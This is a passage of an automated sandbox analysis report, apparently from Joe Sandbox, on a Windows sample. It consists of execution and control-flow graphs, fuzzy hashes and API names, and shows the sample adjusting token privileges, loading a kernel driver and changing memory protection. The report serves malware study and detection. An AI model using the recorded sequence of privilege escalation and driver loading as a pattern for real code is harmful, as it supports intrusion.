                                                          execution_graph 12373 7ffc9cfa58c4 12374 7ffc9cfb5f00 AdjustTokenPrivileges 12373->12374 12376 7ffc9cfb6033 12374->12376 12377 7ffc9cf99d44 12379 7ffc9cf99d4d LoadLibraryW 12377->12379 12380 7ffc9cf99dfd 12379->12380 12381 7ffc9cfa58d4 12382 7ffc9cfb6160 FindCloseChangeNotification 12381->12382 12384 7ffc9cfb61e4 12382->12384 12361 7ffc9cf9287c 12362 7ffc9cf9288f VirtualProtect 12361->12362 12364 7ffc9cf92931 12362->12364 12385 7ffc9cf99b5c 12386 7ffc9cf99b64 12385->12386 12387 7ffc9cf99b72 12386->12387 12389 7ffc9cf99bbb 12386->12389 12391 7ffc9cf99770 12387->12391 12392 7ffc9cf99779 LoadLibraryW 12391->12392 12394 7ffc9cf99ba8 12392->12394 12394->12389 12365 7ffc9cf9187e 12367 7ffc9cf9188b LoadLibraryA 12365->12367 12368 7ffc9cf919f4 12367->12368 12369 7ffc9cfa5890 12370 7ffc9cfa5899 LookupPrivilegeValueW 12369->12370 12372 7ffc9cfb5afa 12370->12372 12399 7ffc9cfa5870 12400 7ffc9cfa5879 NtLoadDriver 12399->12400 12402 7ffc9cfb679e 12400->12402 12395 7ffc9cf91ce2 12396 7ffc9cf91cf1 VirtualAlloc 12395->12396 12398 7ffc9cf91dc7 12396->12398

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 389 7ffc9cfa58c4-7ffc9cfb6031 AdjustTokenPrivileges 394 7ffc9cfb6039-7ffc9cfb60ae call 7ffc9cfb60af 389->394 395 7ffc9cfb6033 389->395 395->394
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: AdjustPrivilegesToken
                                                          • String ID:
                                                          • API String ID: 2874748243-0
                                                          • Opcode ID: 328febc17f466ae486858dbbc8d52777c3db706fe643e9e44dd901143c3d7f07
                                                          • Instruction ID: 7ef79737925a98a7e4e8e210bda5e23a413299e152fda65acd35e8dc53bbb312
                                                          • Opcode Fuzzy Hash: 328febc17f466ae486858dbbc8d52777c3db706fe643e9e44dd901143c3d7f07
                                                          • Instruction Fuzzy Hash: 5C518F31908A2D8FDF58DF08D895AE9B7F1FB68310F0042AAD44EE3291DB74A945CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 441 7ffc9cfa5870-7ffc9cfb679c NtLoadDriver 446 7ffc9cfb67a4-7ffc9cfb67c0 441->446 447 7ffc9cfb679e 441->447 447->446
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: DriverLoad
                                                          • String ID:
                                                          • API String ID: 2513027847-0
                                                          • Opcode ID: c43b70abe8334b2419672b8384d424044dd9299ecf4c8d2bb127a2e0486c10bf
                                                          • Instruction ID: 3d7eda9fb5c23414ea0222a6ab71047da5939bb9d7c059f088ea3e309fc876d4
                                                          • Opcode Fuzzy Hash: c43b70abe8334b2419672b8384d424044dd9299ecf4c8d2bb127a2e0486c10bf
                                                          • Instruction Fuzzy Hash: FA31BF71908A1C9FDB58DB589845BB9BBF0FFA5310F10422ED00AD3152EB71A402CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1221ed9372ad9ea45cd2782bef5525f69f7d665a67bd8d10e0d9a44f2b887fba
                                                          • Instruction ID: ecfb76959678da697cf5330fcd742fba3e24b9516818f2ba8ed0dff0b9dd5434
                                                          • Opcode Fuzzy Hash: 1221ed9372ad9ea45cd2782bef5525f69f7d665a67bd8d10e0d9a44f2b887fba
                                                          • Instruction Fuzzy Hash: 1A22D430A08A1E8FDB69EB2C9455679BBF1EF59300F1401BDE44EC7292EE24A946CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 296 7ffc9cf9187e-7ffc9cf9191c 300 7ffc9cf9191e-7ffc9cf91945 296->300 301 7ffc9cf9198f-7ffc9cf919f2 LoadLibraryA 296->301 300->301 304 7ffc9cf91947-7ffc9cf9194a 300->304 305 7ffc9cf919f4 301->305 306 7ffc9cf919fa-7ffc9cf91a36 call 7ffc9cf91a52 301->306 307 7ffc9cf91984-7ffc9cf9198c 304->307 308 7ffc9cf9194c-7ffc9cf9195f 304->308 305->306 315 7ffc9cf91a38 306->315 316 7ffc9cf91a3d-7ffc9cf91a51 306->316 307->301 310 7ffc9cf91961 308->310 311 7ffc9cf91963-7ffc9cf91976 308->311 310->311 311->311 313 7ffc9cf91978-7ffc9cf91980 311->313 313->307 315->316
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: a0fa858e661b287586ff2e9e0da6cd6b8c454e8538bddc83f8af0470eb22e80a
                                                          • Instruction ID: ebd1b1b0edd7b3948912f9a936bee0283e5a4fedf947c7ea08d9d5ce5255be31
                                                          • Opcode Fuzzy Hash: a0fa858e661b287586ff2e9e0da6cd6b8c454e8538bddc83f8af0470eb22e80a
                                                          • Instruction Fuzzy Hash: 37518130908A4D4FEB58DF28D8557F97BE1FB59310F00826EE84EC7292DB75A941CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 402 7ffc9cf99770-7ffc9cf99dbf 407 7ffc9cf99dc9-7ffc9cf99dfb LoadLibraryW 402->407 408 7ffc9cf99dc1-7ffc9cf99dc6 402->408 409 7ffc9cf99dfd 407->409 410 7ffc9cf99e03-7ffc9cf99e2a 407->410 408->407 409->410
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a74c52611b940416ae5b3c79770380791b22d8fa6dbf1215f6eae5814341d4c2
                                                          • Instruction ID: 75ecc38d4172ffdfba8a8465e5c246779fcd84a4bf6359fc490e9afdca71771d
                                                          • Opcode Fuzzy Hash: a74c52611b940416ae5b3c79770380791b22d8fa6dbf1215f6eae5814341d4c2
                                                          • Instruction Fuzzy Hash: 9F51E9B290CA594FEF24CA5C68056FDBFF0FB65321B04427BC14D93297EA645906C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 412 7ffc9cfa5890-7ffc9cfb5aa4 418 7ffc9cfb5aa6-7ffc9cfb5aab 412->418 419 7ffc9cfb5aae-7ffc9cfb5ab3 412->419 418->419 420 7ffc9cfb5ab5-7ffc9cfb5aba 419->420 421 7ffc9cfb5abd-7ffc9cfb5af8 LookupPrivilegeValueW 419->421 420->421 422 7ffc9cfb5afa 421->422 423 7ffc9cfb5b00-7ffc9cfb5b32 421->423 422->423
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fbc67b9c994c8e5efd4e6edabf2642efcad1af630a24f5cf57f857edb19bbfc0
                                                          • Instruction ID: 31b5eb68e68d0c84b32711930247e4a70c16a12b19b7ade75308b858bf220d94
                                                          • Opcode Fuzzy Hash: fbc67b9c994c8e5efd4e6edabf2642efcad1af630a24f5cf57f857edb19bbfc0
                                                          • Instruction Fuzzy Hash: 1D41F37190CA5C8FDB28DB5898557BABBF0EB64311F00427FD04AD3292EB74A805CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 425 7ffc9cf9287c-7ffc9cf9292f VirtualProtect 429 7ffc9cf92937-7ffc9cf9295f 425->429 430 7ffc9cf92931 425->430 430->429
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: c3e6d87976a999229c94f25f7a474b20366d7469c48aec21611485efa14c3519
                                                          • Instruction ID: a9f062cc38a729c437571aee0d206083a5cdd982d4187b73a1c93f79a5d0a7e9
                                                          • Opcode Fuzzy Hash: c3e6d87976a999229c94f25f7a474b20366d7469c48aec21611485efa14c3519
                                                          • Instruction Fuzzy Hash: 9C31E43090CA5C8FDB1CDF9898456F9BBF1EBA5721F04422FD04AD3292DB746846CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 431 7ffc9cf99d44-7ffc9cf99d4b 432 7ffc9cf99d56-7ffc9cf99dbf 431->432 433 7ffc9cf99d4d-7ffc9cf99d55 431->433 436 7ffc9cf99dc9-7ffc9cf99dfb LoadLibraryW 432->436 437 7ffc9cf99dc1-7ffc9cf99dc6 432->437 433->432 438 7ffc9cf99dfd 436->438 439 7ffc9cf99e03-7ffc9cf99e2a 436->439 437->436 438->439
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: c9d397bd994a4b7b9230d7502ceaceb300d910fdafc8da5a89d82131dcdb54d9
                                                          • Instruction ID: 5c1beb8a02fb0803181f44eae5eff3b3c932945c121b9bd8e2797f54b5a058c9
                                                          • Opcode Fuzzy Hash: c9d397bd994a4b7b9230d7502ceaceb300d910fdafc8da5a89d82131dcdb54d9
                                                          • Instruction Fuzzy Hash: 4131B23190CA5D8FDB59DB589849BE9BBF0EB55321F04422BD049D3291DB74A805CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 448 7ffc9cfa58d4-7ffc9cfb61e2 FindCloseChangeNotification 452 7ffc9cfb61e4 448->452 453 7ffc9cfb61ea-7ffc9cfb6218 448->453 452->453
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 219fa86a63b13864419a3970af2b93acd8a9c33f8ed7580e90e214e239d7ca3d
                                                          • Instruction ID: 40303d9088171a95dd9856328b63ea6e4ae69cdb95630be8665ba18f6acbc1e1
                                                          • Opcode Fuzzy Hash: 219fa86a63b13864419a3970af2b93acd8a9c33f8ed7580e90e214e239d7ca3d
                                                          • Instruction Fuzzy Hash: B321D131A08A1C9FDB58DF58D845BF9BBE0FB65321F00422ED04ED3692DB74A956CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 35652da0c87284e049e3909d0c411e23507138f04c155b8f9fc1a34a7a9c1e23
                                                          • Instruction ID: 23bd0f15452f5efc17147a3bdd1e57b45637ae76fcd4024d190118cb454b48c6
                                                          • Opcode Fuzzy Hash: 35652da0c87284e049e3909d0c411e23507138f04c155b8f9fc1a34a7a9c1e23
                                                          • Instruction Fuzzy Hash: AF31283090CA8D8FEB19DB6898466E8BFF0EF56321F14426FD089D31A2DA646456CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2da7f86111681b1326aa87ad119d67e2aebe41be1d36146c8795eabf4fba386b
                                                          • Instruction ID: b26d3716425ca30081220eaa61080c4dbf800674d52fce33df019ea7bc9ef7ed
                                                          • Opcode Fuzzy Hash: 2da7f86111681b1326aa87ad119d67e2aebe41be1d36146c8795eabf4fba386b
                                                          • Instruction Fuzzy Hash: F3629D7380DBDA4FD769DB2888555A4BFE0EF56320F0405FEC0C9CB5A6FA256885C392
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34530645139a9721727262f3ccdad6a164fac2460c8b2f4077cc2daa18715e49
                                                          • Instruction ID: 7c173aa4ac233099e39499d69f7e89badc5595946b835c7123a883ecac867682
                                                          • Opcode Fuzzy Hash: 34530645139a9721727262f3ccdad6a164fac2460c8b2f4077cc2daa18715e49
                                                          • Instruction Fuzzy Hash: 9812C76280E7DB4FE7669A3489561A57FE0DF53260F0905FAC4C89B5A3FA18184AC362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2024d08011738fbd304ec065682305cc18997bc38cee1682691bd457e994ba45
                                                          • Instruction ID: d1e6f56acbecd722a121c72873495bd7b85732e3f47c78080cc06972aa928996
                                                          • Opcode Fuzzy Hash: 2024d08011738fbd304ec065682305cc18997bc38cee1682691bd457e994ba45
                                                          • Instruction Fuzzy Hash: 28C16B7290CB9A4FD7A9DF18C8559B5FBE1FF56310F0404AED0CACB662FA21A881C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07d917c93c5c4c88b4147b15055a733335aa9b8377b712662fa595030a2381eb
                                                          • Instruction ID: 40d494487ec33d92050fc4983e284dd81f2f903138fe012937fdf1784d069e9d
                                                          • Opcode Fuzzy Hash: 07d917c93c5c4c88b4147b15055a733335aa9b8377b712662fa595030a2381eb
                                                          • Instruction Fuzzy Hash: F4518D3290CB9A4FD759DB18C8559A5FFF1EF96310F0405BEC089C71A6FA26A881C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69471ac9fdaca757a64e42a9d52e9e13ac8bea4edb7143c8af6daa615812cd14
                                                          • Instruction ID: 451fd06fb98e4247863fac33bee9c694c2fe2998fcbdb3a6597a6974b3c92e99
                                                          • Opcode Fuzzy Hash: 69471ac9fdaca757a64e42a9d52e9e13ac8bea4edb7143c8af6daa615812cd14
                                                          • Instruction Fuzzy Hash: 0111507360CF494FD758EA1C9402575F7E1FF96360F0405AED0CAC7653EA12A802C786
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 286321486e67e98ed0f244aa3dd410f8919d04d49408d8b4c58760c0e714a936
                                                          • Instruction ID: d678198c542e429f5e7287b128841ee583951cec5e881678b2a53542f54920d9
                                                          • Opcode Fuzzy Hash: 286321486e67e98ed0f244aa3dd410f8919d04d49408d8b4c58760c0e714a936
                                                          • Instruction Fuzzy Hash: 69115C7360CA9A4FD758E618E4525F9F7D1FFA5320B0401ADE0CEC7292F915A841C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e540faa2362db4a944cae73fd8cbc1c593b43051e475a9d4a0a4be83a8b861b
                                                          • Instruction ID: b55e249238632def00b948b5578ba8e95b456d19da5646cef2fe4fb27144bbc6
                                                          • Opcode Fuzzy Hash: 3e540faa2362db4a944cae73fd8cbc1c593b43051e475a9d4a0a4be83a8b861b
                                                          • Instruction Fuzzy Hash: A5115E6180E3DA4FD713DB748CA26947FF0AF17114B1A41EBC4C88B1A3E728594AC722
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c08156184569c48676d21edf4070673ea43973f6eb7c4d47e7148c0b744389
                                                          • Instruction ID: 077cdcfa17b3ef48cf1fc003e98ec7da20f9ec68e67a573e426d37c969223fc3
                                                          • Opcode Fuzzy Hash: a8c08156184569c48676d21edf4070673ea43973f6eb7c4d47e7148c0b744389
                                                          • Instruction Fuzzy Hash: E4D0A723B1DA690AB31C605C7C030F8E3C0C786270354417FE28EC1687EC06788305DA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p
                                                          • API String ID: 0-2181537457
                                                          • Opcode ID: 930cba0cb9441915c2df82b2f84331703a6e19c4ddeb75c03792d89c0bc4d98a
                                                          • Instruction ID: 6815de6d88ea0c67bb70adb7096a14ba0716179ecc2bf6e4866c3e1746376da1
                                                          • Opcode Fuzzy Hash: 930cba0cb9441915c2df82b2f84331703a6e19c4ddeb75c03792d89c0bc4d98a
                                                          • Instruction Fuzzy Hash: 27F1F6B591F7C99FE30B9B70986A789BFE09F53259F1C04EDC8C69B1B3E65900098319
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424482d2d35f6732a6a039835d9902c49b5811f644196859a0f77fd8b112e225
                                                          • Instruction ID: afe18e74b9897aad2f080fad81723001ebbe819cc7e3b527ce811edd36f4429e
                                                          • Opcode Fuzzy Hash: 424482d2d35f6732a6a039835d9902c49b5811f644196859a0f77fd8b112e225
                                                          • Instruction Fuzzy Hash: DFE1163160CA5E4FEB69EA2CD4549B57BE1EFA5310B1001BEE04EC72A3EE25EC46C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab705add81760a0040b51487a808ca518db2daa873214c6c0b856a00b8a6066a
                                                          • Instruction ID: 37134aaf4c4c7e3081d3516a02ad369483b24b5bf3aac8e337cfa4ae14df5e41
                                                          • Opcode Fuzzy Hash: ab705add81760a0040b51487a808ca518db2daa873214c6c0b856a00b8a6066a
                                                          • Instruction Fuzzy Hash: 37B19217F0D1BA56EB11F63DB4B11EAAB509F82334B0400B3D6D9490E3AF0869CED6B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fd1c41aaea35ee1da4a32d0b2da0bd4eeca13296e576653875b659173288c75
                                                          • Instruction ID: 3de94e3d8d307c69d4e335fdb5c29f4acf22fe9f5a788137398b1a82766072d0
                                                          • Opcode Fuzzy Hash: 3fd1c41aaea35ee1da4a32d0b2da0bd4eeca13296e576653875b659173288c75
                                                          • Instruction Fuzzy Hash: 7E611B53A0D7D68BE729E56CB8100E5AFA1DF5223071940FBC185CA4EFB4589889C3A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:10.1%
                                                          Total number of Nodes:1458
                                                          Total number of Limit Nodes:2
                                                          execution_graph 5639 4039c0 5683 404a88 5639->5683 5641 4039cc GetStartupInfoA GetProcessHeap HeapAlloc 5642 403a0b GetVersionExA 5641->5642 5643 4039fe 5641->5643 5644 403a29 GetProcessHeap HeapFree 5642->5644 5645 403a1b GetProcessHeap HeapFree 5642->5645 5717 40395b 5643->5717 5649 403a55 5644->5649 5647 403a05 _realloc 5645->5647 5648 403aa2 5684 406798 GetModuleHandleA 5648->5684 5649->5648 5650 40395b _fast_error_exit 26 API calls 5649->5650 5650->5648 5652 403aa8 5653 403ab3 __RTC_Initialize 5652->5653 5654 40395b _fast_error_exit 26 API calls 5652->5654 5725 407844 5653->5725 5654->5653 5656 403ac1 5657 403ac5 5656->5657 5658 403acd GetCommandLineA 5656->5658 5740 4069c9 5657->5740 5747 40770f 5658->5747 5665 403af2 5783 4073e3 5665->5783 5666 4069c9 __amsg_exit 23 API calls 5666->5665 5669 403b03 5797 406ae5 5669->5797 5670 4069c9 __amsg_exit 23 API calls 5670->5669 5672 403b15 5803 407386 5672->5803 5673 403b0a 5673->5672 5674 4069c9 __amsg_exit 23 API calls 5673->5674 5674->5672 5679 403b46 5815 406c7b 5679->5815 5683->5641 5685 4067b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5684->5685 5686 4067aa 5684->5686 5688 4067fd TlsAlloc 5685->5688 5829 4064ec 5686->5829 5691 406917 5688->5691 5692 40684b TlsSetValue 5688->5692 5691->5652 5692->5691 5693 40685c 5692->5693 5818 406c99 5693->5818 5697 40686c 5698 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5697->5698 5699 40687c 5698->5699 5700 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5699->5700 5701 40688c 5700->5701 5702 4063cc ___crtInitCritSecAndSpinCount 9 API calls 5701->5702 5703 40689c 5702->5703 5825 403de2 5703->5825 5705 4068a9 5706 406912 5705->5706 5845 406443 TlsGetValue 5705->5845 5707 4064ec __mtterm 6 API calls 5706->5707 5707->5691 5712 406443 ___crtInitCritSecAndSpinCount 5 API calls 5713 4068f0 5712->5713 5713->5706 5714 4068f7 5713->5714 5860 406529 5714->5860 5716 4068ff GetCurrentThreadId 5716->5691 5718 403964 5717->5718 5719 403969 5717->5719 5914 406e85 5718->5914 5923 406ce5 5719->5923 6030 404a88 5725->6030 5727 407850 GetStartupInfoA 5728 407c87 __calloc_crt 7 API calls 5727->5728 5734 407871 5728->5734 5729 407a7b _realloc 5729->5656 5730 4079f8 GetStdHandle 5736 4079c2 5730->5736 5731 407a5d SetHandleCount 5731->5729 5732 407c87 __calloc_crt 7 API calls 5732->5734 5733 407a0a GetFileType 5733->5736 5734->5729 5734->5732 5735 407945 5734->5735 5734->5736 5735->5729 5735->5736 5738 40796e GetFileType 5735->5738 6031 407b82 5735->6031 5736->5729 5736->5730 5736->5731 5736->5733 5737 407b82 ___crtInitCritSecAndSpinCount 16 API calls 5736->5737 5737->5736 5738->5735 5741 406e85 __FF_MSGBANNER 23 API calls 5740->5741 5742 4069ce 5741->5742 5743 406ce5 __amsg_exit 23 API calls 5742->5743 5744 4069d7 5743->5744 5745 406443 ___crtInitCritSecAndSpinCount 5 API calls 5744->5745 5746 403acc 5745->5746 5746->5658 5748 40774a 5747->5748 5749 40772b GetEnvironmentStringsW 5747->5749 5750 407733 5748->5750 5751 4077e5 5748->5751 5749->5750 5752 40773f GetLastError 5749->5752 5753 407774 WideCharToMultiByte 5750->5753 5754 407765 GetEnvironmentStringsW 5750->5754 5755 4077ed GetEnvironmentStrings 5751->5755 5756 403add 5751->5756 5752->5748 5758 4077a8 5753->5758 5759 4077da FreeEnvironmentStringsW 5753->5759 5754->5753 5754->5756 5755->5756 5760 4077fd 5755->5760 5772 407656 5756->5772 6044 407c47 5758->6044 5759->5756 5761 407c47 __malloc_crt 28 API calls 5760->5761 5763 407816 5761->5763 5765 407829 _realloc 5763->5765 5766 40781d FreeEnvironmentStringsA 5763->5766 5770 407831 FreeEnvironmentStringsA 5765->5770 5766->5756 5767 4077b7 WideCharToMultiByte 5768 4077d1 5767->5768 5769 4077c8 5767->5769 5768->5759 6049 403199 5769->6049 5770->5756 5773 407669 5772->5773 5774 40766e GetModuleFileNameA 5772->5774 6066 40603c 5773->6066 5775 407695 5774->5775 6070 4074be 5775->6070 5778 403ae7 5778->5665 5778->5666 5780 407c47 __malloc_crt 28 API calls 5781 4076d7 5780->5781 5781->5778 5782 4074be _parse_cmdline 54 API calls 5781->5782 5782->5778 5784 4073f0 5783->5784 5786 4073f5 _strlen 5783->5786 5785 40603c ___initmbctable 86 API calls 5784->5785 5785->5786 5787 